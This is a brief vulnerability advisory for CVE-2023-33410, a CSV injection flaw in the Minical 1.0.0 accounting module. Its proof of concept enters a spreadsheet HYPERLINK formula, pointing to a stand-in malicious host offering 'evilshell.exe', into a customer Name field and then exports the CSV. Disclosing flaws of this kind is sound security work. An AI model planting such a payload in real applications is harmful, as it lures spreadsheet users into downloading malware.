# CVE-2023-33410
Minical 1.0.0 is vulnerable to CSV Injection.
Vendor: <https://github.com/minical/minical>
Demo Application: <https://demo.minical.io/>
---
## PoC
Step 1: Navigate to the Accounting module and click on Create New Customer.

Step 2: Enter the payload in the Name field and Click on Create.
`Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere") `


Step 3: Click on Download CSV Report and Observe the payload getting rendered.

Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view